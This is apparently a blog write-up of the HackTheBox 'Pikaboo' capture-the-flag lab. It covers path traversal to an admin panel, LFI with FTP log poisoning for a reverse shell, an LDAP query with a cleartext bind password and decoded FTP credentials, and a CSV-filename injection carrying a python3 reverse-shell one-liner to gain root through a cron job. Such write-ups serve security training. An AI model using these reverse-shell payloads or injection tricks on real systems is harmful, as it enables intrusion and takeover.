In this post, I would like to share a walkthrough of the Pikaboo Machine from HackTheBox
This room has been considered difficulty rated as a Hard machine
What will you gain from the Pikaboo machine?
For user flag, you will need to locate a Local File Inclusion vulnerability on the website here you will get user privileges to access via FTP
As for the root flag, you will need to dig deeper within the machine especially LDAP service where you will get a username and password for FTP access
Information Gathering
Once we have started the VPN connection which requires to download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN
As a result, we must whitelist the domain name for the machine “pikaboo.htb”
Let’s open the browser and straight into the website interface.
Surprisingly, there is nothing that is found on the website
From the server-status web interface, we notice there are a few directories that we investigate it.
Finally, we can easily access the directory of /admin../admin_staging as it directs us to a Dashboard
By looking at the website URL, I’m fairly sure that the website has a Local File Inclusion
After I must roam the directory on the website, I managed to find /var/log/vsfptd.log. We managed to see an FTP log on that file.
Gaining Privileges Access
As a result, an NC listener should be running on our terminal to get the reverse shell connection back to us.
We can use the PHP reverse shell which I have done a cheat sheet here
We need to run FTP pikaboo.htb on the terminal which we should insert a PHP execution of shell as our username.
The reverse shell connection requires us to refresh the /var/log/vsfptd.log
Voila! We managed to get the reverse shell connection back to us when we investigate the NC listener terminal
We can clarify which user that we managed to access the machine.
For us to read the user flag by executing the “cat user.txt” command
Escalate to Root Privileges Access
Sadly, we didn’t manage to retrieve any information on SUID from the “sudo -l” command
From my experience, we can investigate crontab to see any latest command that has been running especially with Root Privileges Access.
When I have fully analyzed the crontab file, I notice that /usr/local/bin/csvupdate_cron have been running as root privileges access
While we analyze the content of the csvupdate_cron file, we notice we can abuse the CSV file format.
While roaming inside the server, I notice there’s a configuration file (/opt/pokeapi/config/settings.php) that looks like something shown above
We have managed to get the LDAP password on the file, and it might lead to FTP credentials by running the following command
ldapsearch -x -LLL -h 127.0.0.1 -D 'cn=binduser,ou=users,dc=pikaboo,dc=htb' -w J~42%W?PFHl]g -b 'dc=ftp,dc=pikaboo,dc=htb' -s sub '(objectClass=*)'
As a result, the output that appears from the command above which you will see a base64 password. As a result, we need to decrypt the base64 password
The credentials that have been decrypted can be seen as below:
Username: pwnmeow
Password: _G0tT4_C4tcH'3m_4lL!_
We should be creating a file with the content as below:
touch pikaboo "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("\"IP ADDRESS\",PORT));[os.dup2(s.fileno(),f)for\ f\ in(0,1,2)];pty.spawn(""\"sh\")'; .csv"
We need to access the machine via FTP service by using the credentials that we found earlier
At last, we successfully logged into the machine via FTP, we should change to any subdirectory on the FTP service
Finally, we need to insert the reverse shellcode as following:
put pikaboo "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("\"IP ADDRESS\",PORT));[os.dup2(s.fileno(),f)for\ f\ in(0,1,2)];pty.spawn(""\"sh\")'; .csv"
### We need to start our NC listener before running the command above ###
Based on crontab configuration, it will take around 1 minute to get a reverse shell connection back to us
We successfully access as Root Privileges
We can read the root flag by executing the command “cat root.txt” and submit the flag into Hackthebox website
-THE END-
Happy Learning Guys!
Extra Information
We can go to /etc/shadow to unlock the write-up
No responses yet